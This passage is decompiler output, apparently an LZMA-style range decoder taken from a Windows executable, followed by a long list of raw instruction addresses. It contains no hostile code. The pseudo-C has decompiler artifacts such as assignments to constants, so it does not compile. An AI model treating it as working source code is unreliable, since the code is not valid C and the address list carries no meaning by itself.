											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                                                  0x00000000
                                                  0x00407395
                                                  0x00407395
                                                  0x00407399
                                                  0x004073be
                                                  0x004073c8
                                                  0x00000000
                                                  0x0040739b
                                                  0x0040739b
                                                  0x0040739e
                                                  0x004073a2
                                                  0x004073a5
                                                  0x004073a8
                                                  0x004073ac
                                                  0x004073ac
                                                  0x004073af
                                                  0x00407489
                                                  0x00407489
                                                  0x00407490
                                                  0x00407490
                                                  0x00407493
                                                  0x0040749a
                                                  0x004074c7
                                                  0x004074cb
                                                  0x0040752b
                                                  0x0040752e
                                                  0x00407533
                                                  0x00407534
                                                  0x00407536
                                                  0x00407538
                                                  0x0040753b
                                                  0x00407447
                                                  0x00407447
                                                  0x00407447
                                                  0x00406be3
                                                  0x00406be3
                                                  0x00406be3
                                                  0x00406bec
                                                  0x00000000
                                                  0x00000000
                                                  0x00406bf2
                                                  0x00000000
                                                  0x00406bfd
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c06
                                                  0x00406c09
                                                  0x00406c0c
                                                  0x00406c10
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c16
                                                  0x00406c19
                                                  0x00406c1b
                                                  0x00406c1c
                                                  0x00406c1f
                                                  0x00406c21
                                                  0x00406c22
                                                  0x00406c24
                                                  0x00406c27
                                                  0x00406c2c
                                                  0x00406c31
                                                  0x00406c3a
                                                  0x00406c4d
                                                  0x00406c50
                                                  0x00406c5c
                                                  0x00406c84
                                                  0x00406c86
                                                  0x00406c94
                                                  0x00406c94
                                                  0x00406c98
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406c88
                                                  0x00406c88
                                                  0x00406c8b
                                                  0x00406c8c
                                                  0x00406c8c
                                                  0x00000000
                                                  0x00406c88
                                                  0x00406c62
                                                  0x00406c67
                                                  0x00406c67
                                                  0x00406c70
                                                  0x00406c78
                                                  0x00406c7b
                                                  0x00000000
                                                  0x00406c81
                                                  0x00406c81
                                                  0x00000000
                                                  0x00406c81
                                                  0x00000000
                                                  0x00406c9e
                                                  0x00406c9e
                                                  0x00406ca2
                                                  0x0040754e
                                                  0x00000000
                                                  0x0040754e
                                                  0x00406cab
                                                  0x00406cbb
                                                  0x00406cbe
                                                  0x00406cc1
                                                  0x00406cc1
                                                  0x00406cc1
                                                  0x00406cc4
                                                  0x00406cc8
                                                  0x00000000
                                                  0x00000000
                                                  0x00406cca
                                                  0x00406cd0
                                                  0x00406cfa
                                                  0x00406d00
                                                  0x00406d07
                                                  0x00000000
                                                  0x00406d07
                                                  0x00406cd6
                                                  0x00406cd9
                                                  0x00406cde
                                                  0x00406cde
                                                  0x00406ce9
                                                  0x00406cf1
                                                  0x00406cf4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d39
                                                  0x00406d3f
                                                  0x00406d42
                                                  0x00406d4f
                                                  0x00406d57
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d0e
                                                  0x00406d0e
                                                  0x00406d12
                                                  0x0040755d
                                                  0x00000000
                                                  0x0040755d
                                                  0x00406d1e
                                                  0x00406d29
                                                  0x00406d29
                                                  0x00406d29
                                                  0x00406d2c
                                                  0x00406d2f
                                                  0x00406d32
                                                  0x00406d37
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004073ce
                                                  0x004073ce
                                                  0x004073d4
                                                  0x004073da
                                                  0x004073e0
                                                  0x004073fa
                                                  0x004073fd
                                                  0x00407403
                                                  0x0040740e
                                                  0x0040740e
                                                  0x00407410
                                                  0x004073e2
                                                  0x004073e2
                                                  0x004073f1
                                                  0x004073f5
                                                  0x004073f5
                                                  0x0040741a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040741c
                                                  0x00407420
                                                  0x004075cf
                                                  0x00000000
                                                  0x004075cf
                                                  0x0040742c
                                                  0x00407433
                                                  0x0040743b
                                                  0x0040743e
                                                  0x00407441
                                                  0x00407441
                                                  0x00000000
                                                  0x00000000
                                                  0x00406d5f
                                                  0x00406d61
                                                  0x00406d64
                                                  0x00406dd5
                                                  0x00406dd8
                                                  0x00406ddb
                                                  0x00406de2
                                                  0x00406dec
                                                  0x00000000
                                                  0x00406dec
                                                  0x00406d66
                                                  0x00406d6a
                                                  0x00406d6d
                                                  0x00406d6f
                                                  0x00406d72
                                                  0x00406d75
                                                  0x00406d77
                                                  0x00406d7a
                                                  0x00406d7c
                                                  0x00406d81
                                                  0x00406d84
                                                  0x00406d87
                                                  0x00406d8b
                                                  0x00406d92
                                                  0x00406d95
                                                  0x00406d9c
                                                  0x00406da0
                                                  0x00406da8
                                                  0x00406da8
                                                  0x00406da8
                                                  0x00406da2
                                                  0x00406da2
                                                  0x00406da2
                                                  0x00406d97
                                                  0x00406d97
                                                  0x00406d97
                                                  0x00406dac
                                                  0x00406daf
                                                  0x00406dcd
                                                  0x00406dcf
                                                  0x00000000
                                                  0x00406db1
                                                  0x00406db1
                                                  0x00406db4
                                                  0x00406db7
                                                  0x00406dba
                                                  0x00406dbc
                                                  0x00406dbc
                                                  0x00406dbc
                                                  0x00406dbf
                                                  0x00406dc2
                                                  0x00406dc4
                                                  0x00406dc5
                                                  0x00406dc8
                                                  0x00000000
                                                  0x00406dc8
                                                  0x00000000
                                                  0x00406ffe
                                                  0x00407002
                                                  0x00407020
                                                  0x00407023
                                                  0x0040702a
                                                  0x0040702d
                                                  0x00407030
                                                  0x00407033
                                                  0x00407036
                                                  0x00407039
                                                  0x0040703b
                                                  0x00407042
                                                  0x00407043
                                                  0x00407045
                                                  0x00407048
                                                  0x0040704b
                                                  0x0040704e
                                                  0x0040704e
                                                  0x00407053
                                                  0x00000000
                                                  0x00407053
                                                  0x00407004
                                                  0x00407007
                                                  0x0040700a
                                                  0x00407014
                                                  0x00000000
                                                  0x00000000
                                                  0x00407068
                                                  0x0040706c
                                                  0x0040708f
                                                  0x00407092
                                                  0x00407095
                                                  0x0040709f
                                                  0x0040706e
                                                  0x0040706e
                                                  0x00407071
                                                  0x00407074
                                                  0x00407077
                                                  0x00407084
                                                  0x00407087
                                                  0x00407087
                                                  0x00000000
                                                  0x00000000
                                                  0x004070ab
                                                  0x004070af
                                                  0x00000000
                                                  0x00000000
                                                  0x004070b5
                                                  0x004070b9
                                                  0x00000000
                                                  0x00000000
                                                  0x004070bf
                                                  0x004070c1
                                                  0x004070c5
                                                  0x004070c5
                                                  0x004070c8
                                                  0x004070cc
                                                  0x00000000
                                                  0x00000000
                                                  0x0040711c
                                                  0x00407120
                                                  0x00407127
                                                  0x0040712a
                                                  0x0040712d
                                                  0x00407137
                                                  0x00000000
                                                  0x00407137
                                                  0x00407122
                                                  0x00000000
                                                  0x00000000
                                                  0x00407143
                                                  0x00407147
                                                  0x0040714e
                                                  0x00407151
                                                  0x00407154
                                                  0x00407149
                                                  0x00407149
                                                  0x00407149
                                                  0x00407157
                                                  0x0040715a
                                                  0x0040715d
                                                  0x0040715d
                                                  0x00407160
                                                  0x00407163
                                                  0x00407166
                                                  0x00407166
                                                  0x00407169
                                                  0x00407170
                                                  0x00407175
                                                  0x00000000
                                                  0x00000000
                                                  0x00407203
                                                  0x00407203
                                                  0x00407207
                                                  0x004075a5
                                                  0x00000000
                                                  0x004075a5
                                                  0x0040720d
                                                  0x00407210
                                                  0x00407213
                                                  0x00407217
                                                  0x0040721a
                                                  0x00407220
                                                  0x00407222
                                                  0x00407222
                                                  0x00407222
                                                  0x00407225
                                                  0x00407228
                                                  0x00000000
                                                  0x00000000
                                                  0x00406df8
                                                  0x00406df8
                                                  0x00406dfc
                                                  0x00407569
                                                  0x00000000
                                                  0x00407569
                                                  0x00406e02
                                                  0x00406e05
                                                  0x00406e08
                                                  0x00406e0c
                                                  0x00406e0f
                                                  0x00406e15
                                                  0x00406e17
                                                  0x00406e17
                                                  0x00406e17
                                                  0x00406e1a
                                                  0x00406e1d
                                                  0x00406e1d
                                                  0x00406e20
                                                  0x00406e23
                                                  0x00000000
                                                  0x00000000
                                                  0x00406e29
                                                  0x00406e2f
                                                  0x00000000
                                                  0x00000000
                                                  0x00406e35
                                                  0x00406e35
                                                  0x00406e39
                                                  0x00406e3c
                                                  0x00406e3f
                                                  0x00406e42
                                                  0x00406e45
                                                  0x00406e46
                                                  0x00406e49
                                                  0x00406e4b
                                                  0x00406e51
                                                  0x00406e54
                                                  0x00406e57
                                                  0x00406e5a
                                                  0x00406e5d
                                                  0x00406e60
                                                  0x00406e63
                                                  0x00406e7f
                                                  0x00406e82
                                                  0x00406e85
                                                  0x00406e88
                                                  0x00406e8f
                                                  0x00406e93
                                                  0x00406e95
                                                  0x00406e99
                                                  0x00406e65
                                                  0x00406e65
                                                  0x00406e69
                                                  0x00406e71
                                                  0x00406e76
                                                  0x00406e78
                                                  0x00406e7a
                                                  0x00406e7a
                                                  0x00406e9c
                                                  0x00406ea3
                                                  0x00406ea6
                                                  0x00000000
                                                  0x00406eac
                                                  0x00000000
                                                  0x00406eac
                                                  0x00000000
                                                  0x00406eb1
                                                  0x00406eb1
                                                  0x00406eb5
                                                  0x00407575
                                                  0x00000000
                                                  0x00407575
                                                  0x00406ebb
                                                  0x00406ebe
                                                  0x00406ec1
                                                  0x00406ec5
                                                  0x00406ec8
                                                  0x00406ece
                                                  0x00406ed0
                                                  0x00406ed0
                                                  0x00406ed0
                                                  0x00406ed3
                                                  0x00406ed6
                                                  0x00406ed6
                                                  0x00406ed6
                                                  0x00406edc
                                                  0x00000000
                                                  0x00000000
                                                  0x00406ede
                                                  0x00406ee1
                                                  0x00406ee4
                                                  0x00406ee7
                                                  0x00406eea
                                                  0x00406eed
                                                  0x00406ef0
                                                  0x00406ef3
                                                  0x00406ef6
                                                  0x00406ef9
                                                  0x00406efc
                                                  0x00406f14
                                                  0x00406f17
                                                  0x00406f1a
                                                  0x00406f1d
                                                  0x00406f1d
                                                  0x00406f20
                                                  0x00406f24
                                                  0x00406f26
                                                  0x00406efe
                                                  0x00406efe
                                                  0x00406f06
                                                  0x00406f0b
                                                  0x00406f0d
                                                  0x00406f0f
                                                  0x00406f0f
                                                  0x00406f29
                                                  0x00406f30
                                                  0x00406f33
                                                  0x00000000
                                                  0x00406f35
                                                  0x00000000
                                                  0x00406f35
                                                  0x00406f33
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00406f3a
                                                  0x00000000
                                                  0x00000000
                                                  0x00406f75
                                                  0x00406f75
                                                  0x00406f79
                                                  0x00407581
                                                  0x00000000
                                                  0x00407581
                                                  0x00406f7f
                                                  0x00406f82
                                                  0x00406f85
                                                  0x00406f89
                                                  0x00406f8c
                                                  0x00406f92
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f94
                                                  0x00406f97
                                                  0x00406f9a
                                                  0x00406f9a
                                                  0x00406fa0
                                                  0x00406f3e
                                                  0x00406f3e
                                                  0x00406f41
                                                  0x00000000
                                                  0x00406f41
                                                  0x00406fa2
                                                  0x00406fa2
                                                  0x00406fa5
                                                  0x00406fa8
                                                  0x00406fab
                                                  0x00406fae
                                                  0x00406fb1
                                                  0x00406fb4
                                                  0x00406fb7
                                                  0x00406fba
                                                  0x00406fbd
                                                  0x00406fc0
                                                  0x00406fd8
                                                  0x00406fdb
                                                  0x00406fde
                                                  0x00406fe1
                                                  0x00406fe1
                                                  0x00406fe4
                                                  0x00406fe8
                                                  0x00406fea
                                                  0x00406fc2
                                                  0x00406fc2
                                                  0x00406fca
